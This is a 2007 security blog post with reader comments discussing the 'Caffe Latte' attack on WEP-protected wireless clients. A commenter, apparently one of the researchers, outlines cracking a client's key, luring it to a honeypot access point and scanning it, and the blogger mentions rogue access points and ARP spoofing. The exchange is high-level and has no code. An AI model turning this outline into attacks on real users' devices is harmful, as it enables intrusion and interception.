Sunday, October 21, 2007

A Little Wi-Fi Hacking With Your Half-Caf Nonfat Mochachino?

So like, literally right now Vivek and Sohail from AirTight networks are presenting on a new attack on WEP at Toorcon. This new technique, cheekily dubbed Cafe Latte, attacks clients instead of access points. But according to an interview that the researchers gave prior to Toorcon, the attack can take from a few minutes to a few hours, making it no more efficient than existing techniques.

Cool research guys, but I guess the question I have is this. If I need to attack a mobile client instead of an access point in order to avoid detection by, I dunno, a wireless IDS of some sort - and I have to struggle with position and availability of the target, no less - won't I be shocked to discover that your technique works because this highly secure wireless network uses WEP?!

I'm just saying. Attacks against wireless clients in the field are interesting, and fertile ground for all sorts of cool hacks and lucrative crime. But - and maybe I'm missing the obvious here - I don't get it.


Anonymous said...

Hi Paul,

Actually we refined the attack and now it takes less than 6 minutes and not 30 minutes.

Answering your question: Our idea was to prove that the Client itself can be hacked if it uses WEP. Picture this: A hacker scans the air at an airport, finds a client which probes for a wireless network. If this network uses WEP the current tools such as Karma cannot do much, but using the Caffe Latte attack, they can first break the WEP key for that network. Then bring up a honeypot with that WEP key, have the client associate with this honeypot and then gain IP layer connectivity. Once IP layer connectivity is gained then all the hacker needs is a vulnerability scanner. You know the rest of the story now :)

You can download the ppt from:

PaulM said...

If the attack is reliably below 6 minutes, then that's a more valuable attack because it's faster than attacking the AP with aireplay & friends.

I can also sort-of-maybe see your use case for trying to spoof an AP to a client at a public venue like an airport or coffee shop. However, it seems far easier to sniff for client beacons that use no encryption and spoof those AP's. Or to just spoof an official-sounding AP name and wait for people to attach to you. Or to associate to the official AP. These all get you direct IP access and the last one even gets you MiTM with a little ARP spoofing.

But it's cool research nonetheless.